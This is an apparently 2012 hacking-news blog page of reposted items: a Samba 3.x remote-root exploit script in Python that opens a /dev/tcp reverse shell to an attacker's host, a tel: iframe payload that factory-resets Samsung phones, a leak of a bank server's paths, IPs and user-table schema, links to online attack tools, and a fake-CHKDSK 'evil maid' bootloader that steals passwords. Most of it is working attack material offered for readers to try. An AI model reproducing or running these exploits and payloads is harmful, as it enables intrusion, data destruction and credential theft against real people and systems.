Sep 26, 2012

Shellcode Converter Released by Levis

Levis (of the REPT team) has released a new shellcoder’s tool, ShellOp Converter. This tool allows you to enter shellcode, then view the appropriate opcodes, as well as a disassembly of the code:

Download Link: http://thelegendofrandom.com/blog/tools

Source: http://thelegendofrandom.com/blog/archives/2752

If you like my blog, Please Donate Me

Sep 25, 2012

Remote Wipe Samsung Galaxy S Series

I got this code from tweet and I don't know this code is real or not, if you want to know try it with your risk :),

 RT: @securitygen: Want to remote wipe your friends’ Android phones? Get them to visit a web page with: <frame src=”tel:*2767*3855%23” /> #phun! XD


Update:
I got the detail here.
"The tel protocol is generally used with phone numbers to provide clickable "call me" links on websites: tapping on the hyperlink in the handset's web browser opens up the dialling software and calls the number contained in the link. Such calls aren't made until the fandroid presses a "dial" button, so security is maintained - but some numbers don't require "dial" to be pressed, and it's those which are exploited in this attack.

The best example of an executing number - aka an unstructured supplementary service data message - is *#06#: enter that into just about any GSM phone and it will display the IMEI, the device's serial number. But, importantly, it will do that without one pressing the "dial" button.

That's benign, but try entering *2767*3855# on a Samsung Galaxy S3 and you'll be rewarded with an impossible-to-cancel factory reset before you can say shudda-bought-an-iPhone.

Once one has established that any automatically loaded URL can trigger the behaviour, the attack becomes easy to expand: automatically opening iframes, pushed WAP/USSD messages and NFC tags are capable conduits as elegantly demonstrated over the weekend at Ekoparty 2012:

Not all Samsung handsets are affected; they need to interpret numbers submitted from the browser as though they were typed on the pad, and it seems that some operators have tweaked their handsets to prevent that - although probably not deliberately, it's just a side effect of other changes. Using another web browser should not be effective; there are some claims that Google Chrome is immune, but there are an equal number claiming otherwise.

Samsung hasn't confirmed the attack at the time of writing, but it's safe to assume that a fix will be forthcoming pretty quickly - there's no big technical barrier and Samsung will want to be seen responding rapidly.

The XDA Developers forum has some non-destructive examples should one want to try the hack, but the overall risk should be quite small as the attacker gains nothing from destroying all the data on a phone.
"


Source: http://www.theregister.co.uk/2012/09/25/samsung_flaw/

If you like my blog, Please Donate Me

ITALIAN NATIONAL BANK Was Hacked

If you want to see all detail and full download file, please go to the Source
 
Document_Root : /data/vhosts/multimedia.bnl.it/www/
Server Ip     : 192.168.200.8 | 213.215.231.12
User/Group    : apache(48)/48
Database path : multimedia.bnl.it/phpMyAdmin/ | multimedia.bnl.it/phpmyadmin/
Admin login   : multimedia.bnl.it/login.php

Database list:
- bnl_multimedia
- information_schema

Database: bnl_multimedia  
Table: relay_users
Columns:
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| ADauth          | tinyint(1)       |
| admin           | tinyint(1)       |
| area_interesse  | varchar(255)     |
| data_iscrizione | timestamp        |
| email           | text             |
| id              | int(10) unsigned |
| name            | text             |
| password        | text             |
| path            | text             |
| username        | text             |
+-----------------+------------------+



If you like my blog, Please Donate Me

20 Security and Privacy Apps for Androids and iPhones


HiddenEye
HiddenEye Plus uses your smartphone's camera in self-defense: This app photographs any person who tries to unlock your phone.
Available for: Android
Cost: Free
Average marketplace rating: 3.9 stars

Kryptos
Kryptos uses 256-bit AES encryption to encrypt voice communications before transmission (using 2048 bit RSA for key exchange). Provides VoIP connectivity for secure calls over 3G, 4G and WiFi.
Available for: Android and iPhone
Cost: Free to download, monthly service fee of $10
Average marketplace rating: 3.3 stars

Find my iPhone
If you misplace your iPhone, the Find My iPhone app will let you use another iOS device to find it and protect your data. Locates the missing device on a map, plays a sound, displays a message, remotely locks the device and/or erases all the data on it.
Available for: iPhone
Cost: Free
Average marketplace rating: 2.5 stars

SeekDroid
SeekDroid (similar to Find My iPhone) allows the user to locate a lost or stolen Android device. Features device location on a map, remote audible alarm, remote wiping of the device, remote tracking and GPS.
Available for: Android
Cost: $2.99
Average marketplace rating: 4.5 stars

Plan B
Plan B is a find-my-phone app that you download AFTER you lose your phone. Described as a “last resort” to find a missing phone, allows the user to locate their lost device using cell towers and GPS. On some phones, Plan B can switch GPS on automatically.
Available for: Android
Cost: Free
Average marketplace rating: 4.2 stars

Secure Folder PRO
A private storage solution for photos, videos, contacts, notes, credit cards and passwords. Features secret website bookmarks and private navigation system without history tracking, a “decoy” storage area to trick nosy intruders, and encrypted storage for credit card and other data.
Available for: iPhone
Cost: $1.99
Average marketplace rating: 4.5 stars

Gallery Lock
Gallery Lock provides privacy for picture and video files by hiding them in individual, password-protected folders.
Available for: Android
Cost: Free
Average marketplace rating: 4.5 stars

Privacy Filter
Privacy Filter blocks the screen from prying eyes glancing at the device from the side.
Available for: Android
Cost: $1.99
Average marketplace rating: 4.2 stars

Splash ID Safe
A sensitive-data vault that stores personal information (such as web logins, credit cards, PINs, and email settings) using 256-bit encryption.
Available for: Android
Cost: $9.99
Average marketplace rating: 3.8 stars

Norton Snap
Norton Snap is a QR code scanner that warns the device user about dangerous QR codes, and blocks unsafe Web sites before they load on the device.
Available for: Android and iPhone
Cost: Free
Average marketplace rating: 4.3 stars

Avast Free Mobile Security
Famous from the PC space, Avast also offers this antivirus and anti-theft Android security application. Includes scanning of installed apps and memory card content on demand. Also features a privacy report, which scans and displays access rights and intents of installed apps, as well as anti-theft components that give the user remote control via SMS or Web to lock, locate, siren, memory or wipe the device.
Available for: Android
Cost: Free
Average marketplace rating: 4.7 stars

Lookout Mobile Security
The Android version of this app includes antivirus and blocks malware, spyware, and trojans and scans each app downloaded. Both the Android and iPhone versions feature a find-my-phone component, which locates a lost or stolen phone on a Google map and activates a loud alarm, even if the device is on silent.
Available for: Android, limited version for iPhone
Cost: Free
Average marketplace rating: 4.5 stars

AVG Mobilation Antivirus
AVG's version of antivirus for smartphones detects harmful apps and text messages. Features include scanning of apps, settings, files, and media in real time, location of lost or stolen phone via Google Maps, lock and wipe device to protect privacy.
Available for: Android
Cost: Free
Average marketplace rating: 4.5 stars

Norton Mobile Security
Security, antivirus, antitheft protection. Includes automatic antivirus scan for downloaded apps and app updates, keystroke logging protection, remote lock and wipe, find-my-phone phone locator, and a “scream” locator that lets the user send a text to the missing phone, which sets off a scream alarm.
Available for: Android
Cost: Free
Average marketplace rating: 4.4 stars 

NQ Mobile
Security and antivirus protection against from virus, malware, spyware, trojans and phone hacking. Features include: antivirus, anti-harassment, privacy protection, phone locator, data backup, safe browsing and traffic.
Available for: Android
Cost: Free
Average marketplace rating: 4.5 stars

McAfee Mobile Security
McAfee's version of protection for the Android; features antivirus, anti-theft, safe mobile surfing, app protection and call and SMS filter. Other features include remote device lock, locate and track.
Available for: Android
Cost: Free trial
Average marketplace rating: 4.0 stars

Accellion Mobile
Allows business users to work on enterprise content by providing secure mobile access to files. Features: Securely browse, view, edit, save back, upload, send, and share files and folders on-the-go. Participate in real-time collaboration by opening, editing, and saving back Microsoft Office file types through Quickoffice.
Available for: Android and iPhone
Cost: Free
Average marketplace rating: 3.2 stars

Junos Pulse
Junos Pulse secures connectivity to corporate web-based applications via Juniper Networks SSL VPN gateways. Also delivers mobile security against malware, viruses, and spyware, as well as from device loss or theft, preventing device damage, and loss and exploitation of sensitive user or corporate data.
Available for: Android and iPhone
Cost: Free
Average marketplace rating: 3.5 stars

WiFi Protector
Guards against WiFi sniffing attacks by detecting Address Resolution Protocol (ARP)-related attacks, such a DDOS (Denial Of Service) or MITM (Man In The Middle). Protects the phone from tools like FaceNiff, Cain & Abel, ANTI, ettercap, DroidSheep, NetCut, and others that try to hijack sessions via "Man In The Middle" through ARP spoofing / ARP poisoning.
Available for: Android
Cost: $3.89
Average marketplace rating: 4.7 stars

Privacy Safe
Automatically moves confidential SMS and call logs from private contacts into private space and hides the normal track on your phone. Notifies of private space status secretly. Private space is password protected. Also blocks unwanted SMS using keywords specified by the owner.
Available on: Android
Cost: Free
Average marketplace rating: 4.5 stars

Source: http://www.cio.com/slideshow/detail/66549/20-Security-and-Privacy-Apps-for-Androids-and-iPhones















If you like my blog, Please Donate Me

Penetration Testing With Online Tools.


Word Press
Remote Code Execution
, BruteForce via IP , Theme ScaNne via IP , Theme ScaNne , Site Extracte. Joomla
Turbo Brute Force , Token ScaNe Server, ScaNner Site Extracte,
vBulletin 

vB SQL[4.0.x =>4.1.3] , vB Brut Force [Proxy]
Sql 

SQL Server ScaNne, SQL Target ScanNer, SQL Dork ScaNne, SQL Injection Helpe,r Admin Finder. LFI 
LFI Server ScaNner, LFI ToOl'z Kit, LFI Inject Shell, LFI File Dumper.
Other Tools 
  
Whois Multiple Service, WHMCS LFI Exploit, Multiple CMS ScaNner, Server ScaNn3r CMS,
Server Dork Sc4nN3r, Exploit Finder, Script'z Finder ,Shell Finder ,Users Finder Via IP, Zone-H Poster, Crypte / Decrypte, Decrypte ToOl'z.

To use all This Go to
http://www.s3c-l4b.com/


Source: http://www.hackguide4u.com/2012/09/online-penetration-testing-tools-private.html

If you like my blog, Please Donate Me

Sep 24, 2012

Samba 0 Day?

I have this code from many tweet in this evening. It says that "this is the samba 0day". If someone have already try it, please tell me, it's real or not.

  1. #!/usr/bin/python
  2. #
  3. # finding targets 4 31337z:
  4. # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
  5. #    -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
  6. # found by eax samba 0day godz (loljk)
  7.  
  8.  
  9. from binascii import hexlify, unhexlify
  10. import socket
  11. import threading
  12. import SocketServer
  13. import sys
  14. import os
  15. import time
  16. import struct      
  17.  
  18. targets = [
  19.         {
  20.                 "name"               : "samba_3.6.3-debian6",
  21.                 "chunk_offset"       : 0x9148,
  22.                 "system_libc_offset" : 0xb6d003c0
  23.         },
  24.         {
  25.                 "name"               : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
  26.                 "chunk_offset"       : 4560,
  27.                 "system_libc_offset" : 0xb20
  28.         },
  29.         {
  30.                 "name"               : "target_finder (hardcode correct system addr)",
  31.                 "chunk_offset"       : 0,
  32.                 "system_libc_offset" : 0xb6d1a3c0,
  33.                 "finder": True
  34.         }
  35. ]
  36.  
  37. do_brute = True
  38. rs = 1024
  39. FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
  40.  
  41. def dump(src, length=32):
  42.         result=[]
  43.         for i in xrange(0, len(src), length):
  44.                 s = src[i:i+length]
  45.                 hexa = ' '.join(["%02x"%ord(x) for x in s])
  46.                 printable = s.translate(FILTER)
  47.                 result.append("%04x   %-*s   %s\n" % (i, length*3, hexa, printable))
  48.         return ''.join(result)
  49.  
  50.  
  51. sploitshake = [
  52.         # HELLO
  53.         "8100004420434b4644454e4543464445" + \
  54.         "46464346474546464343414341434143" + \
  55.         "41434143410020454745424644464545" + \
  56.         "43455046494341434143414341434143" + \
  57.         "4143414341414100",
  58.  
  59.         # NTLM_NEGOT
  60.         "0000002fff534d427200000000000000" + \
  61.         "00000000000000000000000000001d14" + \
  62.         "00000000000c00024e54204c4d20302e" + \
  63.         "313200",
  64.  
  65.         # SESSION_SETUP
  66.         "0000004bff534d427300000000080000" + \
  67.         "000000000000000000000000ffff1d14" + \
  68.         "000000000dff000000ffff02001d1499" + \
  69.         "1f00000000000000000000010000000e" + \
  70.         "000000706f736978007079736d6200",
  71.  
  72.         # TREE_CONNECT
  73.         "00000044ff534d427500000000080000" + \
  74.         "000000000000000000000000ffff1d14" + \
  75.         "6400000004ff00000000000100190000" + \
  76.         "5c5c2a534d425345525645525c495043" + \
  77.         "24003f3f3f3f3f00",
  78.  
  79.         # NT_CREATE
  80.         "00000059ff534d42a200000000180100" + \
  81.         "00000000000000000000000001001d14" + \
  82.         "6400000018ff00000000050016000000" + \
  83.         "000000009f0102000000000000000000" + \
  84.         "00000000030000000100000040000000" + \
  85.         "020000000306005c73616d7200"
  86. ]
  87.  
  88. pwnsauce = {
  89.         'smb_bind': \
  90.                 "00000092ff534d422500000000000100" + \
  91.                 "00000000000000000000000001001d14" + \
  92.                 "6400000010000048000004e0ff000000" + \
  93.                 "0000000000000000004a0048004a0002" + \
  94.                 "002600babe4f005c504950455c000500" + \
  95.                 "0b03100000004800000001000000b810" + \
  96.                 "b8100000000001000000000001007857" + \
  97.                 "34123412cdabef000123456789ab0000" + \
  98.                 "0000045d888aeb1cc9119fe808002b10" + \
  99.                 "486002000000",
  100.  
  101.         'data_chunk': \
  102.                 "000010efff534d422f00000000180000" + \
  103.                 "00000000000000000000000001001d14" + \
  104.                 "640000000eff000000babe00000000ff" + \
  105.                 "0000000800b0100000b0103f00000000" + \
  106.                 "00b0100500000110000000b010000001" + \
  107.                 "0000009810000000000800",
  108.  
  109.         'final_chunk': \
  110.                 "000009a3ff534d422f00000000180000" + \
  111.                 "00000000000000000000000001001d14" + \
  112.                 "640000000eff000000babe00000000ff" + \
  113.                 "00000008006409000064093f00000000" + \
  114.                 "00640905000002100000006409000001" + \
  115.                 "0000004c09000000000800"
  116. }
  117.  
  118.  
  119. def exploit(host, port, cbhost, cbport, target):
  120.         global sploitshake, pwnsauce
  121.  
  122.         chunk_size = 4248
  123.  
  124.         target_tcp = (host, port)
  125.  
  126.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  127.         s.connect(target_tcp)
  128.  
  129.         n = 0
  130.         for pkt in sploitshake:
  131.                 s.send(unhexlify(pkt))
  132.                 pkt_res = s.recv(rs)
  133.                 n = n+1
  134.  
  135.         fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
  136.  
  137.         s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
  138.         pkt_res = s.recv(rs)
  139.  
  140.         buf = "X"*20  # policy handle
  141.         level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS
  142.         buf+=struct.pack('<H',level) # level
  143.         buf+=struct.pack('<H',level)# level2
  144.         buf+=struct.pack('<L',1)#auditing_mode
  145.         buf+=struct.pack('<L',1)#ptr
  146.         buf+=struct.pack('<L',100000) # r->count
  147.         buf+=struct.pack('<L',20) # array_size
  148.         buf+=struct.pack('<L',0)
  149.         buf+=struct.pack('<L',100)
  150.  
  151.         buf += ("A" * target['chunk_offset'])
  152.  
  153.         buf+=struct.pack("I", 0);
  154.         buf+=struct.pack("I", target['system_libc_offset']);
  155.         buf+=struct.pack("I", 0);
  156.         buf+=struct.pack("I", target['system_libc_offset']);
  157.         buf+=struct.pack("I", 0xe8150c70);
  158.         buf+="AAAABBBB"
  159.  
  160.         cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
  161.  
  162.         tmp = cmd*(816/len(cmd))
  163.         tmp += "\x00"*(816-len(tmp))
  164.  
  165.         buf+=tmp
  166.         buf+="A"*(37192-target['chunk_offset'])
  167.         buf+='z'*(100000 - (28000 + 10000))
  168.  
  169.         buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]
  170.         n=0
  171.  
  172.         for chunk in buf_chunks:
  173.                 if len(chunk) != chunk_size:
  174.                         #print "LAST CHUNK #%d" % n
  175.                         bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
  176.                         s.send(bb)
  177.                 else:
  178.                         #print "CHUNK #%d" % n
  179.                         bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
  180.                         s.send(bb)
  181.                         retbuf = s.recv(rs)
  182.                 n=n+1
  183.  
  184.         s.close()
  185.  
  186. class connectback_shell(SocketServer.BaseRequestHandler):
  187.         def handle(self):
  188.                 global do_brute
  189.  
  190.                 print "\n[!] connectback shell from %s" % self.client_address[0]
  191.                 do_brute = False
  192.  
  193.                 s = self.request
  194.  
  195.                 import termios, tty, select, os
  196.                 old_settings = termios.tcgetattr(0)
  197.                 try:
  198.                         tty.setcbreak(0)
  199.                         c = True
  200.                         while c:
  201.                                 for i in select.select([0, s.fileno()], [], [], 0)[0]:
  202.                                         c = os.read(i, 1024)
  203.                                         if c:
  204.                                                 if i == 0:
  205.                                                         os.write(1, c)
  206.  
  207.                                                 os.write(s.fileno() if i == 0 else 1, c)
  208.                 except KeyboardInterrupt: pass
  209.                 finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
  210.  
  211.                 return
  212.                
  213.  
  214. class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
  215.         pass
  216.  
  217.  
  218. if len(sys.argv) != 6:
  219.         print "\n  {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
  220.         print "  usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
  221.         print "  targets:"
  222.         i = 0
  223.         for target in targets:
  224.                 print "    %02d) %s" % (i, target['name'])
  225.                 i = i+1
  226.  
  227.         print ""
  228.         sys.exit(-1)
  229.  
  230.  
  231. target = targets[int(sys.argv[5])]
  232.  
  233. server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
  234. server_thread = threading.Thread(target=server.serve_forever)
  235. server_thread.daemon = True
  236. server_thread.start()
  237.  
  238. while do_brute == True:
  239.         sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
  240.         sys.stdout.flush()
  241.         exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
  242.  
  243.         if "finder" in target:
  244.                 target['chunk_offset'] += 4
  245.         else:
  246.                 target['system_libc_offset'] += 0x1000
  247.  
  248.  
  249. if "finder" in target:
  250.         print \
  251.                 "{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
  252.                 "system_libc_offset = 0x%03x" % \
  253.                 (target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)
  254.  
  255. while 1:
  256.         time.sleep(999)
  257.  
  258. server.shutdown()
Source: http://pastebin.com/AwpsBWVQ

If you like my blog, Please Donate Me

Evilmaid_CHKDSK

Evil Maid CHKDSK

This is s simple 512-byte MBR program that pretends to be Windows CHKDSK. It asks the user for a password, writes that password back to the media it booted from, renders that media unbootable, and reboots.

An bootable 'evil maid' tool that pretends to be Windows CHKDSK  


To assemble

nasm -f bin bootloader.asm -o bootme

To install on a disk

dd if=./bootme of=/dev/<device>

To extract the saved password

dd if=/dev/<device> count=1 bs=512 > dump.hex ; xxd dump.hex
Easy peasy.


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |